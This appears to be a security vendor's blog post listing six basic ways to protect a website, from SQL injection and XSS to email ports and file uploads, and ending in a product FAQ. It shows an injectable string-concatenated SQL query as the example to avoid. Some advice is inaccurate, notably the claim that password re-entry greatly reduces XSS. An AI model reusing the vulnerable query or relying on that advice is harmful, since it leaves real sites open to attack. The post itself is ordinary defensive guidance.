If there’s one specific reason why website owners don’t take steps to boost their online security to protect their blogs and websites from attackers, it’s usually because they believe one of two things:
- They don’t believe their website or blog has anything worth of real value to attackers
- They don’t believe that they ever will be attacked regardless
Both of these mindsets are the exact opposite of the way you should be thinking about website security. Failing to take just basic steps to guard your websites against attackers means that you as well as your customers are at serious risk of identity theft and fraud.
To help ensure that this never happens to you, we’re going to talk about the six most simple ways that you can take to protect your website from attackers right now.
While taking these steps won’t guarantee that your website or blog will never be broken into, it will at the very least significantly decrease the risk of it ever happening:
1 – Shield Your Website Against SQL Injection
An SQL Injection attack is when an attacker uses a URL parameter to manipulate your database and thereby gain access to your site.
You are also at serious risk of becoming a victim of an SQL Injection attack if you are currently utilizing a standard Transact SQL, because it’s very easy for an attacker to type in a rogue code into your query to gain access to your data and information.
To stop this from happening to you, you need to use a parameterized query, which is simple to implement as most web languages have it.
For instance, a common query would look like this:
“SELECT * FROM table WHERE column - ‘ “ + parameter + “ ‘ ; “
To prevent an attacker from adding a query to the end of this statement, you will need to parameterize it.
You can do this by changing it to look like this:
$stmt = $pdo->prepare(‘SELECT * FROM table WHERE column = :value’); $stmt->execute(array(‘value’ => $parameter));
From 2015 to 2016 alone, the number of compromised websites increased by 32%. This is why you need to take action right away, and shielding against SQL Injections should be one of the very first security actions that you take.
2 – Install A Security Socket Layer
The best way to add a security socket layer (SSL) to your website will be to use HTTPS, which is a protocol that allows you to send secure communication over your computer network, and ensures that no intruders will be able to tap into your content.
This means that users will be able to browse your website securely while submitting their financial information or login details.
For this reason, you’ll always want to use HTTPS on your website pages where users will be submitting their sensitive information, such as login details or credit card information. Otherwise, if an attacker steals it, they’ll be able to imitate the user.
Furthermore, enabling HTTPS will also help make your website more visible, as Google will boost websites in the search engine rankings that use HTTPS.
3 – Guard Against XSS Attacks
An XSS, or Cross-site Scripting, attack stands in contrast to other kinds of attacks (such as an SQL Injection like we talked about previously) in that they are designed to attack the users of an application or server rather than the application or server itself.
By installing the malicious code, the attacker will be able to gather cookie data, which could contain sensitive user information such as their credit card numbers, session IDs, and login information.
The best way to protect against an XSS attack will be for your Web application to use an advanced SDL, or security development lifecycle. The purpose of an SDL is simply to limit the number of coding errors in your application.
Something else you can do is to make your users re-enter passwords before accessing certain pages on your website. Even if your user has a cookie that will log them into your site automatically, you should still make them have to re-enter their login information again. This will greatly reduce the chances of an XSS attack.
4 – Watch Your Email Transmission Ports
A prime target for attackers to access your information will not be your actual website but rather your email.
Have you ever asked yourself how secure you think your email transmissions are?
The good news is that there is a quick and easy way to figure out how secure your transmissions are.
Go to your email settings to check out which ports your are communicating through.
If you are communicating through the IMAP Port 143, POP3 Port 110, or SMTP Port 25 ports, then your email transmissions are NOT secured.
If, on the other hand, you are communicating through the IMAP Port 993, POP3 Port 995, or SMTP Port 465, then your emails are secured because those ports are secured via encryption.
5 – Don’t Allow File Uploads (Or At Least Be Highly Suspicious)
You’re always taking a major risk by allowing file uploads to your website in the first place. No matter how harmless the uploaded file may look, it could contain a script that opens up your website to attackers.
Even allowing users to upload an image or avatar can be a security risk. If you do have a form that allows file uploads, then you need to treat every uploaded file with suspicion. You can’t trust the file extension to verify that the file uploaded indeed an image because the image can be faked. Any image formats, for instance, allow a comment section to be stored that could contain a malicious PHP code.
The best solution here is to stop direct access to any uploaded files to your website. When this occurs, any files that are uploaded to your website will be stored in an outside folder. You can then create a script to find those files in the private folder before delivering them to your browser.
In addition, if you are going to allow uploaded files, you are going to want to use the most secure transport methods available like SSH or SFTP. It also would be wise to be running your database on a server different from your web server.
If you use cloud hosting, many providers have a unique environment that allows for permission or denial of file uploads based on a visitor’s location, as determined by their IP address.
You could block uploads from specific countries, say China and Iran, while permitting everything else. Or conversely, you could block uploads from any IP address except those originating from whitelisted geos — eg, the United States, U.K., Canada, etc.
Personally, I’ve found it more effective to simply stop direct access to any file uploads and/or uploaded files on my sites. Masking an IP address is child’s play, as any VPN reviews would attest to. Most leading virtual private network providers are able to mask IP addresses with near certainty. Further, a no-tolerance policy is often the best solution for keeping out malicious files (and helps me sleep better at night).
6 – Invest in Website Vulnerability Scanners
Finally, you can also invest in website vulnerability scanners that will identify technical weaknesses in your website, including weaknesses that will be vulnerable to SQL Injection and XSS attacks among many others.
When choosing a website vulnerability scanner to use, there are several key features that you’ll want to look for.
For instance, it’s important that your scanner will cover vulnerabilities that go beyond common ones such as Cross-site Scripting. One example of a less common vulnerability that your scanner should cover is failing to secure directories.
It’s also critical that your scanner remain relevant over a long period of time, so it should be updated on a continuous basis with the most recent known vulnerabilities as well. This means that the scanner should have a very well qualified team working behind the scenes to stay ahead of cyber criminals.
Finally, pay close attention to scalability as well, especially if you have hundreds if not thousands of applications that you need to cover.
In conclusion, these are the six most simple and yet effective ways that you can keep your website secure from attackers.
Again, these methods won’t guarantee your website’s security, but they will make it significantly more secure and less appealing to attackers than it was before, and that’s what matters.
Frequently asked questions
Public websites cannot be fully protected against hacking attempts. The best way to protect them is to find vulnerabilities using a specialized scanner and eliminate them. You can also temporarily band-aid vulnerabilities using a web application firewall before you can fix them.
Learn how Acunetix can work together with a web application firewall.
To protect a WordPress site you must immediately install all WordPress and plugin updates. However, certain vulnerabilities may exist even if you are using the latest versions. Therefore, to make sure that your WordPress site is safe, you need to use a vulnerability scanner regularly.
Learn about best security practices for your WordPress site.
There are three types of problems that can affect websites: web vulnerabilities, network vulnerabilities, and malware. The most dangerous are web vulnerabilities, so you need a web vulnerability scanner. However, Acunetix can scan your website for network problems and malware as well.
Some web vulnerabilities can let an attacker gain access to your resources, databases, operating systems, and potentially move on to your other systems. Other web vulnerabilities can endanger your users and let attackers steal their credentials. Even minor unprotected websites can cause major problems.
See how a black hat hacker can gain complete control of a system through the web.
To be safe, schedule a weekly full vulnerability scan, a daily incremental scan, and a daily high-risk vulnerability scan. Scan not only your production websites but your staging websites as well. If you build your own web software, integrate Acunetix into the SDLC.
Get the latest content on web security
in your inbox each week.